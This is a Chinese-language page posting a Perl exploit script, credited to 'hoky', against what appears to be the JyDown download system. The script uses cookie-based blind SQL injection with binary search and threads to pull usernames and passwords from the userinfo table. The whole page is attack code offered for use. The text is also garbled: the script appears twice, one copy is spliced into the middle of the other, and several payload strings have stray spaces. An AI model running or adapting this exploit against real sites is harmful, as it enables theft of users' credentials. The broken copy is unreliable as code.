信息来源:hoky
复制内容到剪贴板
代码:
#!/usr/bin/perl
use IO::Sock
#!/usr/bin/perl
use IO::Socket;
use threads;
$lhost = $ARGV[0];#主机IP
$port = $ARGV[1];#端口号,默认80
$path = $ARGV[2];
$id = $ARGV[3];
$mod = $ARGV[4];
$char = $ARGV[5];
$argv_len=@ARGV;
if($argv_len<=4) { usage(); exit(); }
if($mod==0)
{
get_user_len($id);
get_pwd_len($id);
}
elsif($mod==1)
{
#get_user($id,$char);
my $i;
for($i=1;$i<=$char;$i++)
{
$t[$i]=threads->new(\&get_user,$id,$i);
}
for($i=1;$i<=$char;$i++)
{
$t[$i]->join();
}
}
elsif($mod==2)
{
#get_pwd($id,$char);
my $i;
for($i=1;$i<=$char;$i++)
{
$t[$i]=threads->new(\&get_pwd,$id,$i);
}
for($i=1;$i<=$char;$i++)
{
$t[$i]->join();
}
}
exit();
sub get_user()
{
my($id,$char_now)=@_;
my $aaa=bin_s(0,123,$path,$char_now,$id);
print "The $char_now char:".chr($aaa)."\n";
}
sub bin_s()
{
my ($low,$high,$path,$char_now,$id)=@_;
my $lh=($low+$high)/2;
my $aaaa=$lh-int($lh);
my $mid;
if($aaaa>0)
{
$mid=int($lh)+1;
}
else
{
$mid=int($lh);
}
my $mid_flag=GetRequest($path,"xxxxxxxx'%09union%09select%09*%0 9from%09userinfo%09where%09id%3D".$id."%09and%09asc(mid(user ,$char_now,1))>".$mid."%09and%09'1%3D1");
my $mid1_flag;
if($mid_flag==0)
{
$mid1_flag=GetRequest($path,"xxxxxxxx'%09union%09select%09*% 09from%09userinfo%09where%09id%3D".$id."%09and%09asc(mid(use r,$char_now,1))%3D".$mid."%09and%09'1%3D1");
}
else
{
$mid1_flag=0;
}
#print "\n low:$low mid:$mid high:$high $mid_flag $mid1_flag char_now:$char_now id:$id";
if($mid_flag==0&&$mid1_flag==1)
{
return $mid;
}
elsif($mid_flag==1&&$mid1_flag==0)
{
bin_s($mid,$high,$path,$char_now,$id);
}
elsif($mid_flag==0&&$mid1_flag==0)
{
bin_s($low,$mid,$path,$char_now,$id);
}
}
sub get_pwd()
{
my($id,$char_now)=@_;
my $aaa=bin_pwd_s(0,123,$path,$char_now,$id);
print "The $char_now char:".chr($aaa)."\n";
}
sub bin_pwd_s()
{
my ($low,$high,$path,$char_now,$id)=@_;
my $lh=($low+$high)/2;
my $aaaa=$lh-int($lh);
my $mid;
if($aaaa>0)
{
$mid=int($lh)+1;
}
else
{
$mid=int($lh);
}
my $mid_flag=GetRequest($path,"xxxxxxxx'%09union%09select%09*%0 9from%09userinfo%09where%09id%3D".$id."%09and%09asc(mid(pwd, $char_now,1))>".$mid."%09and%09'1%3D1");
my $mid1_flag;
if($mid_flag==0)
{
$mid1_flag=GetRequest($path,"xxxxxxxx'%09union%09select%09*% 09from%09userinfo%09where%09id%3D".$id."%09and%09asc(mid(pwd ,$char_now,1))%3D".$mid."%09and%09'1%3D1");
}
else
{
$mid1_flag=0;
}
#print "\n low:$low mid:$mid high:$high $mid_flag $mid1_flag char_now:$char_now id:$id";
if($mid_flag==0&&$mid1_flag==1)
{
return $mid;
}
elsif($mid_flag==1&&$mid1_flag==0)
{
bin_pwd_s($mid,$high,$path,$char_now,$id);
}
elsif($mid_flag==0&&$mid1_flag==0)
{
bin_pwd_s($low,$mid,$path,$char_now,$id);
}
}
sub get_user_len()
{
my($id)=@_;
for($user_j=1;$user_j<=30;$user_j++)
{
$user_flag=GetRequest($path,"xxxxxxxx'%09union%09select%09*% 09from%09userinfo%09where%09id%3D".$id."%09and%09len(user)%3 D".$user_j."%09and%09'1%3D1");
if($user_flag==1){last;}
}
if($user_j<31)
{
print "User_length of id $id: $user_j\n";
}
else
{
print "Can't get user length\n";
}
return $user_j;
}
sub get_pwd_len()
{
my($id)=@_;
my $user_j,$user_flag;
for($user_j=1;$user_j<=30;$user_j++)
{
$user_flag=GetRequest($path,"xxxxxxxx'%09union%09select%09*% 09from%09userinfo%09where%09id%3D".$id."%09and%09len(pwd)%3D ".$user_j."%09and%09'1%3D1");
if($user_flag==1){last;}
}
if($user_j<31)
{
print "Pass_length of id $id: $user_j\n";
}
else
{
print "Can't get password length\n";
}
return $user_j;
}
sub GetRequest()
{
my($lpath,$usercookie)=@_;
$remote=IO::Socket::INET->new (Proto => "tcp", PeerAddr=>$lhost, PeerPort => $port, Type => SOCK_STREAM) or die "Couldnt connect to $lhost:$port : $@\n";
$remote->autoflush(1);
$content=" type=save&pwd=tttttt3333tttt&pwd1=&pwd2=&oic q=33337788&email=fsadf@fsf.com&homepage=&qm=& ;softurl=&b1=%C8%B7%C8%CF%D0%DE%B8%C4 ";
$length=length($content);
$post="POST ".$lpath." HTTP/1.1\r\n".
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*\r\n".
"Referer: http://".$lhost.":".$port."/".$path."\r\n".
"Accept-Language: zh-cn\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE2)\r\n".
"Host: $lhost\r\n".
"Content-Length: ".$length."\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n".
"Cookie:iscookies=0; JyDownUserDj=0; JyDownUserName=".$usercookie."\r\n\r\n".
$content;
print $remote $post;
my $flag=0;
for($i=1;$i<=40;$i++)
{
$line=<$remote>;
if(index($line,"原密码错误")!=-1)
{
$flag=1;
}
}
close $remote;
return $flag;
}
sub usage()
{
print "$0 host port path id mod char\n";
print "mod 0 用户名和密码长度 1 猜用户 2 猜密码\n";
print "char 猜测字符位置 1-20";
}et;
use threads;
$lhost = $ARGV[0];#主机IP
$port = $ARGV[1];#端口号,默认80
$path = $ARGV[2];
$id = $ARGV[3];
$mod = $ARGV[4];
$char = $ARGV[5];
$argv_len=@ARGV;
if($argv_len<=4) { usage(); exit(); }
if($mod==0)
{
get_user_len($id);
get_pwd_len($id);
}
elsif($mod==1)
{
#get_user($id,$char);
my $i;
for($i=1;$i<=$char;$i++)
{
$t[$i]=threads->new(\&get_user,$id,$i);
}
for($i=1;$i<=$char;$i++)
{
$t[$i]->join();
}
}
elsif($mod==2)
{
#get_pwd($id,$char);
my $i;
for($i=1;$i<=$char;$i++)
{
$t[$i]=threads->new(\&get_pwd,$id,$i);
}
for($i=1;$i<=$char;$i++)
{
$t[$i]->join();
}
}
exit();
sub get_user()
{
my($id,$char_now)=@_;
my $aaa=bin_s(0,123,$path,$char_now,$id);
print "The $char_now char:".chr($aaa)."\n";
}
sub bin_s()
{
my ($low,$high,$path,$char_now,$id)=@_;
my $lh=($low+$high)/2;
my $aaaa=$lh-int($lh);
my $mid;
if($aaaa>0)
{
$mid=int($lh)+1;
}
else
{
$mid=int($lh);
}
my $mid_flag=GetRequest($path,"xxxxxxxx'%09union%09select%09*%0 9from%09userinfo%09where%09id%3D".$id."%09and%09asc(mid(user ,$char_now,1))>".$mid."%09and%09'1%3D1");
my $mid1_flag;
if($mid_flag==0)
{
$mid1_flag=GetRequest($path,"xxxxxxxx'%09union%09select%09*% 09from%09userinfo%09where%09id%3D".$id."%09and%09asc(mid(use r,$char_now,1))%3D".$mid."%09and%09'1%3D1");
}
else
{
$mid1_flag=0;
}
#print "\n low:$low mid:$mid high:$high $mid_flag $mid1_flag char_now:$char_now id:$id";
if($mid_flag==0&&$mid1_flag==1)
{
return $mid;
}
elsif($mid_flag==1&&$mid1_flag==0)
{
bin_s($mid,$high,$path,$char_now,$id);
}
elsif($mid_flag==0&&$mid1_flag==0)
{
bin_s($low,$mid,$path,$char_now,$id);
}
}
sub get_pwd()
{
my($id,$char_now)=@_;
my $aaa=bin_pwd_s(0,123,$path,$char_now,$id);
print "The $char_now char:".chr($aaa)."\n";
}
sub bin_pwd_s()
{
my ($low,$high,$path,$char_now,$id)=@_;
my $lh=($low+$high)/2;
my $aaaa=$lh-int($lh);
my $mid;
if($aaaa>0)
{
$mid=int($lh)+1;
}
else
{
$mid=int($lh);
}
my $mid_flag=GetRequest($path,"xxxxxxxx'%09union%09select%09*%0 9from%09userinfo%09where%09id%3D".$id."%09and%09asc(mid(pwd, $char_now,1))>".$mid."%09and%09'1%3D1");
my $mid1_flag;
if($mid_flag==0)
{
$mid1_flag=GetRequest($path,"xxxxxxxx'%09union%09select%09*% 09from%09userinfo%09where%09id%3D".$id."%09and%09asc(mid(pwd ,$char_now,1))%3D".$mid."%09and%09'1%3D1");
}
else
{
$mid1_flag=0;
}
#print "\n low:$low mid:$mid high:$high $mid_flag $mid1_flag char_now:$char_now id:$id";
if($mid_flag==0&&$mid1_flag==1)
{
return $mid;
}
elsif($mid_flag==1&&$mid1_flag==0)
{
bin_pwd_s($mid,$high,$path,$char_now,$id);
}
elsif($mid_flag==0&&$mid1_flag==0)
{
bin_pwd_s($low,$mid,$path,$char_now,$id);
}
}
sub get_user_len()
{
my($id)=@_;
for($user_j=1;$user_j<=30;$user_j++)
{
$user_flag=GetRequest($path,"xxxxxxxx'%09union%09select%09*% 09from%09userinfo%09where%09id%3D".$id."%09and%09len(user)%3 D".$user_j."%09and%09'1%3D1");
if($user_flag==1){last;}
}
if($user_j<31)
{
print "User_length of id $id: $user_j\n";
}
else
{
print "Can't get user length\n";
}
return $user_j;
}
sub get_pwd_len()
{
my($id)=@_;
my $user_j,$user_flag;
for($user_j=1;$user_j<=30;$user_j++)
{
$user_flag=GetRequest($path,"xxxxxxxx'%09union%09select%09*% 09from%09userinfo%09where%09id%3D".$id."%09and%09len(pwd)%3D ".$user_j."%09and%09'1%3D1");
if($user_flag==1){last;}
}
if($user_j<31)
{
print "Pass_length of id $id: $user_j\n";
}
else
{
print "Can't get password length\n";
}
return $user_j;
}
sub GetRequest()
{
my($lpath,$usercookie)=@_;
$remote=IO::Socket::INET->new (Proto => "tcp", PeerAddr=>$lhost, PeerPort => $port, Type => SOCK_STREAM) or die "Couldnt connect to $lhost:$port : $@\n";
$remote->autoflush(1);
$content=" type=save&pwd=tttttt3333tttt&pwd1=&pwd2=&oic q=33337788&email=fsadf@fsf.com&homepage=&qm=& ;softurl=&b1=%C8%B7%C8%CF%D0%DE%B8%C4 ";
$length=length($content);
$post="POST ".$lpath." HTTP/1.1\r\n".
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*\r\n".
"Referer: http://".$lhost.":".$port."/".$path."\r\n".
"Accept-Language: zh-cn\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE2)\r\n".
"Host: $lhost\r\n".
"Content-Length: ".$length."\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n".
"Cookie:iscookies=0; JyDownUserDj=0; JyDownUserName=".$usercookie."\r\n\r\n".
$content;
print $remote $post;
my $flag=0;
for($i=1;$i<=40;$i++)
{
$line=<$remote>;
if(index($line,"原密码错误")!=-1)
{
$flag=1;
}
}
close $remote;
return $flag;
}
sub usage()
{
print "$0 host port path id mod char\n";
print "mod 0 用户名和密码长度 1 猜用户 2 猜密码\n";
print "char 猜测字符位置 1-20";
}
